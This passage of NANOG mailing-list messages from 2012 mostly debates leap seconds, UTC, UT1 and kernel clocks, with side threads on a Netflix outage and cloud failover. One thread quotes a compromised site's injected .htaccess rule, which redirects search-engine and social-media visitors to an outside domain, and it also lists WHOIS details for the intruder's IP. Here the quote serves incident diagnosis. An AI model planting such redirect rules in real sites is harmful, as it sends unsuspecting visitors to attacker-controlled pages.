it can be a DNS cache poisoning (a very rare > > >> event, despite what the media say) when there are many much more > > >> realistic possibilities (specially for a Web site written in > > >> PHP)? > > >> > > >> What was the evidence pointing to a DNS problem? > > >> > > > > > > It seems likely that he made a mistake in his analysis of the evidence. > > > Something that could happen to anyone when operating outside of a > comfort > > > zone or having a bad day. Go easy. > > > > > > -DR > > > > -- > > - (2^(N-1)) > > > > > > > > -- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer From nick at foobar.org Tue Jul 3 13:33:05 2012 From: nick at foobar.org (Nick Hilliard) Date: Tue, 03 Jul 2012 19:33:05 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703175905.GA15977@pob.ytti.fi> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> Message-ID: <4FF33AE1.50105@foobar.org> On 03/07/2012 18:59, Saku Ytti wrote: > Leap bugs are NOT known. Most people have no idea unixtime is not > monotonically increasing. > I had no idea myself until sunday, I had assumed we really go 59 -> 60 -> > 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2. > To me this is fundamentally and inherently broken. Well, yeah, it's not obvious that a minute can have anywhere between 59 and 62 seconds. Certainly if POSIX were being redesigned, they ought to consider using libtai. Google's approach to this is interesting: > http://googleblog.blogspot.ie/2011/09/time-technology-and-leaping-seconds.html i.e. controlled clock slew until the correct offset is reached, thereby allowing their developers to assume a monotonic system clock. Nick From kyle.creyts at gmail.com Tue Jul 3 13:33:23 2012 From: kyle.creyts at gmail.com (Kyle Creyts) Date: Tue, 3 Jul 2012 14:33:23 -0400 Subject: No DNS poisoning at Google (in case of trouble, blame the DNS) In-Reply-To: References: <20120627075051.GA11061@nic.fr> <20120627132604.GA74019@DataIX.net> Message-ID: and upon further investigation, it seems like there might be an actual organization using a host with that IP... http://www.robtex.com/dns/chatwithus.net.html#shared On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts wrote: > it actually appears that skywire has a suballocation for that block, > http://www.robtex.com/ip/208.88.11.111.html#whois > > # > # The following results may also be obtained via: > # http://whois.arin.net > /rest/nets;q=208.88.11.111 > ?showDetails=true&showARIN=false&ext=netref2 > # > > American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 > - 208.88.11.255 > > Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 > - 208.88.11.255 > > # > # ARIN WHOIS data and services are subject to the Terms of Use > # available at: https://www.arin.net > /whois_tou.html > # > > On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black wrote: > >> By the way, FTP access originated from: 208.88.11.111 >> >> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - >> 208.88.11.255 >> >> NetRange: 208.88.8.0 - 208.88.11.255 >> CIDR: 208.88.8.0/22 >> OriginAS: AS40603 >> NetName: SKYWIRE-SG >> NetHandle: NET-208-88-8-0-1 >> Parent: NET-208-0-0-0-0 >> NetType: Direct Allocation >> Comment: http://www.skywireusa.com >> RegDate: 2008-03-04 >> Updated: 2012-03-02 >> Ref: http://whois.arin.net/rest/net/NET-208-88-8-0-1 >> >> OrgName: Sky Wire Communications >> OrgId: DGSU >> Address: 946 W Sunset Blvd Ste L >> City: St George >> StateProv: UT >> PostalCode: 84770 >> Country: US >> RegDate: 2007-12-04 >> Updated: 2009-11-04 >> Ref: http://whois.arin.net/rest/org/DGSU >> >> >> Who We Are >> Skywire Communications is the Leading High Speed Internet Provider in >> Southern Utah. Offering Service in St George, Washington, Santa Clara, >> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to >> provide high speed internet access to 100 Percent of Southern Utah. We are >> located in St George, Utah. >> >> >> >> >> matthew black >> information technology services >> california state university, long beach >> >> >> >> -----Original Message----- >> From: Matthew Black [mailto:Matthew.Black at csulb.edu] >> Sent: Wednesday, June 27, 2012 9:52 AM >> To: 'Jason Hellenthal'; Arturo Servin >> Cc: nanog at nanog.org >> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the >> DNS) >> >> Ask and ye shall receive: >> >> # more .htaccess (backup copy) >> >> #c3284d# >> >> RewriteEngine On >> RewriteCond %{HTTP_REFERER} >> ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt >> >> avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea >> >> rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d >> >> ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel >> >> and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea >> >> rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| >> >> jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l >> >> ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse >> >> arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea >> >> rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s >> >> uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin >> >> e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| >> >> westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) >> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] >> >> #/c3284d# >> >> # # # >> >> matthew black >> information technology services >> california state university, long beach >> >> >> >> -----Original Message----- >> From: Jason Hellenthal [mailto:jhellenthal at dataix.net] >> Sent: Wednesday, June 27, 2012 6:26 AM >> To: Arturo Servin >> Cc: nanog at nanog.org >> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the >> DNS) >> >> >> What would be nice is the to see the contents of the htaccess file >> (obviously with sensitive information excluded) >> >> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: >> > >> > It was not DNS issue, but it was a clear case on how community-support >> helped. >> > >> > Some of us may even learn some new tricks. :) >> > >> > Regards, >> > as >> > >> > Sent from mobile device. Excuse brevity and typos. >> > >> > >> > On 27 Jun 2012, at 05:07, Daniel Rohan wrote: >> > >> > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer < >> bortzmeyer at nic.fr>wrote: >> > > >> > > What made you think it can be a DNS cache poisoning (a very rare >> > >> event, despite what the media say) when there are many much more >> > >> realistic possibilities (specially for a Web site written in >> > >> PHP)? >> > >> >> > >> What was the evidence pointing to a DNS problem? >> > >> >> > > >> > > It seems likely that he made a mistake in his analysis of the >> evidence. >> > > Something that could happen to anyone when operating outside of a >> comfort >> > > zone or having a bad day. Go easy. >> > > >> > > -DR >> > >> >> -- >> >> - (2^(N-1)) >> >> >> >> >> >> >> >> > > > -- > Kyle Creyts > > Information Assurance Professional > BSidesDetroit Organizer > -- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer From saku at ytti.fi Tue Jul 3 13:42:57 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 3 Jul 2012 21:42:57 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF33AE1.50105@foobar.org> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <4FF33AE1.50105@foobar.org> Message-ID: <20120703184257.GA15997@pob.ytti.fi> On (2012-07-03 19:33 +0100), Nick Hilliard wrote: > Google's approach to this is interesting: > > > http://googleblog.blogspot.ie/2011/09/time-technology-and-leaping-seconds.html Yes. I'm sure this is good enough for most people, most people don't need precise time but virtually everyone needs monotonic time. And this is easy to deploy TAI + UTC presentation using leapsecond file lookup isn't exactly easy. Too bad this isn't standard configuration option in NTPd. Also one thing I wonder, why did GOOG choose to skew in just 24h, why not the moment leap is announced? Everyone has some accuracy budget, what ever that might be, it almost certainly is same every day. So you could live with tighter accuracy budget the longer you spend skewing. PC clock on average is probably like 15PPM accurate (or order magnitude of worse, IBM servers seem to be exception). If you'd skew 3 months, your skewing would cause inaccuracy of 0.19PPM. Skewing in single day causes inaccuracy of 11.6PPM (still almost certainly better than free-running PC oscillator) -- ++ytti From kmedcalf at dessus.com Tue Jul 3 14:06:11 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Tue, 03 Jul 2012 13:06:11 -0600 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF33AE1.50105@foobar.org> Message-ID: God damn that's a horrid piece of shit web site. You have to disable security and permit remote code execution or it does not work. What a crock! --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org > -----Original Message----- > From: Nick Hilliard [mailto:nick at foobar.org] > Sent: Tuesday, 03 July, 2012 12:33 > To: Saku Ytti > Cc: nanog at nanog.org > Subject: Re: F-ckin Leap Seconds, how do they work? > > On 03/07/2012 18:59, Saku Ytti wrote: > > Leap bugs are NOT known. Most people have no idea unixtime is not > > monotonically increasing. > > I had no idea myself until sunday, I had assumed we really go 59 -> 60 -> > > 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2. > > To me this is fundamentally and inherently broken. > > Well, yeah, it's not obvious that a minute can have anywhere between 59 and > 62 seconds. Certainly if POSIX were being redesigned, they ought to > consider using libtai. > > Google's approach to this is interesting: > > > http://googleblog.blogspot.ie/2011/09/time-technology-and-leaping- > seconds.html > > i.e. controlled clock slew until the correct offset is reached, thereby > allowing their developers to assume a monotonic system clock. > > Nick From jra at baylink.com Tue Jul 3 14:24:16 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 3 Jul 2012 15:24:16 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <878vf1i5sb.fsf@arbol.wsrcc.com> Message-ID: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Wolfgang S. Rupprecht" > Maybe we should stop wrenching the poor system time back and forth. We > no longer add or subtract daylight savings time (or timezones) to the > kernel time, why do we do it with leapseconds? We should really move > the leapseconds correction into the display routines like DST and > timezones already are. I believe the Olson time code already has ifdefs > for doing this. I wonder why the system's internal time isn't run that > way. I cannot tell you how (literally) shocked I was, to learn from John Stull (at IBM, the first guy, apparently, to locate the current screwup and create kernel patches for it) that *the kernel gets this so wrong*. It's so off that I wasn't sure I was interpreting the situation properly until you posted this. This pain should have been undergone at least 15 years ago; 235960 is a perfectly valid timestamp; ISO8601 says so. Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From george.herbert at gmail.com Tue Jul 3 14:26:35 2012 From: george.herbert at gmail.com (George Herbert) Date: Tue, 3 Jul 2012 12:26:35 -0700 Subject: FYI Netflix is down In-Reply-To: <24628127.12292.1341337095357.JavaMail.root@benjamin.baylink.com> References: <24628127.12292.1341337095357.JavaMail.root@benjamin.baylink.com> Message-ID: <84917B1C-C092-4A19-829D-784107198E1F@gmail.com> On Jul 3, 2012, at 10:38 AM, Jay Ashworth wrote: > ----- Original Message ----- >> From: "Steven Bellovin" > >> Subject: Re: FYI Netflix is down >> On Jul 2, 2012, at 3:43 PM, Greg D. Moore wrote: >> >>> At 03:08 PM 7/2/2012, George Herbert wrote: >>> >>> If folks have not read it, I would suggest reading Normal Accidents >>> by Charles Perrow. >> >> Strong second to that suggestion. > > Quite unfortunately, that book appears not to be in Safari's library. > > Does anyone here know anyone at Safari? Not the Safari division, but ORA yes, others at my company do. Will forward the suggestion. George William Herbert Sent from my iPhone From jra at baylink.com Tue Jul 3 14:27:07 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 3 Jul 2012 15:27:07 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <779D9856-CAC8-478E-BB7F-96913F8E6D6D@delong.com> Message-ID: <10203536.12328.1341343627358.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Owen DeLong" > DST is a time-zone specific phenomenon. Nobody said *anything* about DST; that's a complete red herring to discussions of leap seconds. > Leap seconds are changes to the actual core time. UTC moves with leap > seconds. Correct. > The system clock needs to be UTC, not UTC ? some offset stuck > somewhere that keeps some form of running tally of the current leap > second offset since the epoch. Nope. UTC *includes* leap seconds already. It's UT1 that does not. Are you suggesting that NTP timekeeping should be based on UT1? Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From jra at baylink.com Tue Jul 3 14:33:42 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 3 Jul 2012 15:33:42 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <217021.1341327089@turing-police.cc.vt.edu> Message-ID: <123504.12334.1341344022612.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "valdis kletnieks" > When the published API has been "the system clock is in UTC" for some 3 > decades, I hardly think it's acceptable to call apps "buggy" for assuming that > the system clock is in fact using UTC and breaking if you switch it to > something that's not UTC. And the new time *has* to have different semantics > than UTC, because if it doesn't then what's the point of changing it? Correct. It's very likely that there is *no* sufficiently compelling application requirement that justifies switching NTP from UTC to UT1/TAI. So far as I can tell, the *only* requirement is "I need to be able to calculate unixtime<->ISO8601 reliably to the second for times further away than the next possible leapsecond"; I have not had pointed out to me yet an application which actually requires that; I'm 99 44/100% certain that there isn't one with a sufficiently compelling story to break 3 decades of code. Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From dot at dotat.at Tue Jul 3 14:44:01 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 20:44:01 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF33AE1.50105@foobar.org> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <4FF33AE1.50105@foobar.org> Message-ID: Nick Hilliard wrote: > > Well, yeah, it's not obvious that a minute can have anywhere between 59 and > 62 seconds. No a minute cannot have 62 seconds. That is an old documentation bug which has been fixed. http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/time.h.html Tony. -- f.anthony.n.finch http://dotat.at/ Viking, North Utsire, South Utsire: Southeasterly 4 or 5, increasing 6 at times. Moderate. Occasional rain, fog patches. Moderate, occasionally very poor. From roll at Stupi.SE Tue Jul 3 21:49:40 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Tue, 3 Jul 2012 21:49:40 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com> Message-ID: > > Maybe we should stop wrenching the poor system time back and forth. We > > no longer add or subtract daylight savings time (or timezones) to the > > kernel time, why do we do it with leapseconds? We should really move > > the leapseconds correction into the display routines like DST and > > timezones already are. I believe the Olson time code already has ifdefs > > for doing this. I wonder why the system's internal time isn't run that > > way. > > I cannot tell you how (literally) shocked I was, to learn from John Stull > (at IBM, the first guy, apparently, to locate the current screwup and > create kernel patches for it) that *the kernel gets this so wrong*. > > It's so off that I wasn't sure I was interpreting the situation properly > until you posted this. > > This pain should have been undergone at least 15 years ago; 235960 is > a perfectly valid timestamp; ISO8601 says so. I leave the computer kernels out of this for a second..:-) We have a timescale that runs at constant speed forward it's named "TAI", it is based on the definition on the atomic second. Some systems like GPS have their own idea of a "base time" and then they have a way of telling the difference between "their timescale" and UTC. In the case of GPS, they took the numer of leap seconds currently in play when the system was launched and keept that. (as their calendar is 1024 weeks, mosty receivers use the UTC-GPS ofset to figure out what modulo 1024 weeks we are in). TAI is atomic time, UTC(k) is what we use for practical timekeeping, and the problem at hand is that the atomic second runs at constant speed, but the earth is not. Leapseconds can be both positive and negative, but up to now, the earth has only slowed down, so we have added seconds. There are applications on the earth that deals with the earth position in repect to other planets and the sun, so in order to have one timescale for everyone UTC is compensated for the earth rotation speed, when the solar time differs from atomic time with more than 0.94 seconds, we compensate by adding or deleting a second the last minute of the last day of a month, in pratice they have picked new-years and jun/jul. You have all heard "GMT", if we don't insert leap seconds as the earth is slowing down "GMT" will be "PMT" (paris mean time) in some 65000 years. And day and night will be swapped in 12*65000 years. So in order to avoid having to ask someone gving you a time and date what timescale he/she refers to refered we have UTC, and as all things in life it's a compromize. --Peter Ps: fix your broken code, most systems can handle "leap days" by now, every 4 years, except years that ends with 00.. From owen at delong.com Tue Jul 3 14:46:34 2012 From: owen at delong.com (Owen DeLong) Date: Tue, 3 Jul 2012 12:46:34 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703175905.GA15977@pob.ytti.fi> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> Message-ID: <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> On Jul 3, 2012, at 10:59 AM, Saku Ytti wrote: > On (2012-07-03 10:11 -0700), Owen DeLong wrote: > >> Trading one known set of bugs for a (probably) larger set of unknown bugs is not my definition of progress. Cost without progress is harmful and should be avoided. > > Leap bugs are NOT known. Most people have no idea unixtime is not > monotonically increasing. > I had no idea myself until sunday, I had assumed we really go 59 -> 60 -> > 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2. > To me this is fundamentally and inherently broken. > > It's quite hard to find code which stores timestamp and then compares it in > future to timestamp which assumes time can travel backwards. > Most bugs are just things that should last 5s last 6s or 4s, but certainly > the bugs exist and developers were not aware that they exist. > > > -- > ++ytti If you don't know that time is not monotonically increasing, then that only becomes a software bug when you codify your own ignorance into software you write. It is well known that leap seconds exist. The rotation of the planet does not line up well with the orbit of the planet and neither of these lines up particularly well with the rotation and orbit of the moon. Since we have a long standing tradition of using the orbit of the earth to determine years and the orbit of the moon to divide years into months, we use some fudge-factors on the months to make years and months line up. (12 true months would leave us several days short of a complete orbit at the end of the year and seasons would migrate.) Since we have a tradition of measuring diurnal and other repetitive cycles (days) based on the rotation of the earth, we end up with fudge factors to make that line up with months from time to time. (leap seconds). So it goes. Time is much more complex than many people realize. If you write software where time matters, it is your responsibility to learn about these things. Owen From malayter at gmail.com Tue Jul 3 15:00:07 2012 From: malayter at gmail.com (Ryan Malayter) Date: Tue, 3 Jul 2012 15:00:07 -0500 Subject: FYI Netflix is down Message-ID: Jon Lewis wrote: > It seems like if you're going to outsource your mission critical > infrastructure to "cloud" you should probably pick at least 2 > unrelated cloud providers and if at all possible, not outsource the > systems that balance/direct traffic...and if you're really serious > about it, have at least two of these setup at different facilities > such that if the primary goes offline, the secondary takes over. If a > cloud provider fails, you redirect to another. Really, you need at least three independent providers. One primary (A), one backup (B), and one "witness" to monitor the others for failure. The witness site can of course be low-powered, as it is not in the data plane of the applications, but just participates in the control plane. In the event of a loss of communication, the majority clique wins, and the isolated environments shut themselves down. This is of course how any sane clustering setup has protected against "split brain" scenarios for decades. Doing it the right way makes the cloud far less cost-effective and far less "agile". Once you get it all set up just so, change becomes very difficult. All the monitoring and fail-over/fail-back operations are generally application-specific and provider-specific, so there's a lot of lock-in. Tools like RightScale are a step in the right direction, but don't really touch the application layer. You also have to worry about the availability of yet another provider! -- RPM From roll at Stupi.SE Tue Jul 3 22:07:26 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Tue, 3 Jul 2012 22:07:26 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID: And I forgot: They made a "mistake" and missed their intentions of a solar day year 1900 when defining the atomic second. Off by 2s in 100 years. -p From kmedcalf at dessus.com Tue Jul 3 15:08:01 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Tue, 03 Jul 2012 14:08:01 -0600 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <10203536.12328.1341343627358.JavaMail.root@benjamin.baylink.com> Message-ID: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> > > The system clock needs to be UTC, not UTC ? some offset stuck > > somewhere that keeps some form of running tally of the current leap > > second offset since the epoch. > Nope. UTC *includes* leap seconds already. It's UT1 that does not. > Are you suggesting that NTP timekeeping should be based on UT1? The system clock should be based on UT1 and should be monotonically increasing since this matches the common concept of time. Calculations done with this value are all based on it being UT1 and using the "common" notion of UT1 rules. The root cause of the difficulties is that someone decided that the system clock would not maintain "wall clock" time (UT1) but rather some other timebase and then "step" that time to keep it in sync with UT1. NTP can keep time in UTC (or anything else) if it wants, but it should discipline the system clock to monotonically increasing UT1. --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From saku at ytti.fi Tue Jul 3 15:09:53 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 3 Jul 2012 23:09:53 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> Message-ID: <20120703200953.GA16042@pob.ytti.fi> On (2012-07-03 12:46 -0700), Owen DeLong wrote: > If you don't know that time is not monotonically increasing, then that only becomes a software bug when you codify your own ignorance into software you write. If only all software could be ordered from you Owen, but in practice this is not possible. Some code will be written less intelligent people. And reviewing any code doing foo = timestamp+offset and if now > foo, virtually never expects time to move backwards. UTC doesn't move backwards (it goes 59 -> 60 -> 00). TAI does not move backwards. Unixtime moves backwards, like spanish inquisition no one expects that. > It is well known that leap seconds exist. Quite. But it is not well known that unixtime travels backwards. -- ++ytti From roll at Stupi.SE Tue Jul 3 22:18:24 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Tue, 3 Jul 2012 22:18:24 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> Message-ID: > > > The system clock needs to be UTC, not UTC =C2=B1 some offset stuck > > > somewhere that keeps some form of running tally of the current leap > > > second offset since the epoch. > > > Nope. UTC *includes* leap seconds already. It's UT1 that does not. > > > Are you suggesting that NTP timekeeping should be based on UT1? > > The system clock should be based on UT1 and should be monotonically increas= > ing since this matches the common concept of time. Calculations done with = > this value are all based on it being UT1 and using the "common" notion of U= > T1 rules. The root cause of the difficulties is that someone decided that = > the system clock would not maintain "wall clock" time (UT1) but rather some= > other timebase and then "step" that time to keep it in sync with UT1. > > NTP can keep time in UTC (or anything else) if it wants, but it should disc= > ipline the system clock to monotonically increasing UT1. UTC is the universal time. UT1 is "astronomical time". As the definition of a atomic second is 9192631770 complete oscillations of cesium 133 between enery level 3 and 4, "everyone" can make a second in their lab, that's TAI. Just add the lepsecond ofset and you have UTC. UT1-UTC is done by observations from radio astronomers VLBI telecopes and a comitee, you can't make one in your lab, and it's not real time. --P (The only SI metric you can't make is a kilogram, you have to have one of the 28 kilos in the world..) From roll at Stupi.SE Tue Jul 3 22:21:12 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Tue, 3 Jul 2012 22:21:12 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703200953.GA16042@pob.ytti.fi> Message-ID: > UTC doesn't move backwards (it goes 59 -> 60 -> 00) or 58 -> 00 --P From jra at baylink.com Tue Jul 3 15:26:57 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 3 Jul 2012 16:26:57 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> Message-ID: <5694479.12394.1341347217229.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Keith Medcalf" > > Are you suggesting that NTP timekeeping should be based on UT1? > > The system clock should be based on UT1 and should be monotonically > increasing since this matches the common concept of time. Calculations > done with this value are all based on it being UT1 and using the > "common" notion of UT1 rules. The root cause of the difficulties is > that someone decided that the system clock would not maintain "wall > clock" time (UT1) but rather some other timebase and then "step" that > time to keep it in sync with UT1. UTC is monotonic, and is based on UT1. Just not deterministically. :-) The root cause *is* that someone made a bad decision about kernel timekeeping, but it wasn't the choice of timescale. Non-monotonic time is not a feature of UTC *either*. > NTP can keep time in UTC (or anything else) if it wants, but it should > discipline the system clock to monotonically increasing UT1. As I undertstand it, the problem is not how NTP disciplined the kernel, it's what the kernel does itself. Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From roll at Stupi.SE Tue Jul 3 22:33:02 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Tue, 3 Jul 2012 22:33:02 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID: (source http://physics.nist.gov/cuu/Units/second.html ) Unit of time (second) Abbreviations: CGPM, CIPM, BIPM The unit of time, the second, was defined originally as the fraction 1/86 400 of the mean solar day. The exact definition of "mean solar day" was left to astronomical theories. However, measurement showed that irregularities in the rotation of the Earth could not be taken into account by the theory and have the effect that this definition does not allow the required accuracy to be achieved. In order to define the unit of time more precisely, the 11th CGPM (1960) adopted a definition given by the International Astronomical Union which was based on the tropical year. Experimental work had, however, already shown that an atomic standard of time-interval, based on a transition between two energy levels of an atom or a molecule, could be realized and reproduced much more precisely. Considering that a very precise definition of the unit of time is indispensable for the International System, the 13th CGPM (1967) decided to replace the definition of the second by the following (affirmed by the CIPM in 1997 that this definition refers to a cesium atom in its ground state at a temperature of 0 K): The second is the duration of 9 192 631 770 periods of the radiation corresponding to the transition between the two hyperfine levels of the ground state of the cesium 133 atom. If anyone still thinks UT1; We have a NTP server on Earth (say Washington-DC) and Vint has extended the Internet to planet Mars, can we use NTP? (Hints: Looking at the clock on Earth from Mars, you se a satellite with a orbit, gravity changes by other plaets, unknown distance, unknown orbits and time runs faster on mars than on earth..) --P From eugen at leitl.org Tue Jul 3 15:47:52 2012 From: eugen at leitl.org (Eugen Leitl) Date: Tue, 3 Jul 2012 22:47:52 +0200 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com> Message-ID: <20120703204752.GS12615@leitl.org> On Tue, Jul 03, 2012 at 09:49:40PM +0200, Peter Lothberg wrote: > I leave the computer kernels out of this for a second..:-) > > We have a timescale that runs at constant speed forward it's named > "TAI", it is based on the definition on the atomic second. Notice that in inertial frame dragging context it's provably impossible to synchronize oscillators. Luckily, Earth has negligible frame dragging, for the kind of accuracy we currently need. For operative values of time lunaticism, there's always http://www.leapsecond.com/time-nuts.htm From bicknell at ufp.org Tue Jul 3 15:52:56 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Tue, 3 Jul 2012 13:52:56 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703204752.GS12615@leitl.org> References: <24843980.12324.1341343456309.JavaMail.root@benjamin.baylink.com> <20120703204752.GS12615@leitl.org> Message-ID: <20120703205256.GA25086@ussenterprise.ufp.org> In a message written on Tue, Jul 03, 2012 at 10:47:52PM +0200, Eugen Leitl wrote: > Notice that in inertial frame dragging context it's provably > impossible to synchronize 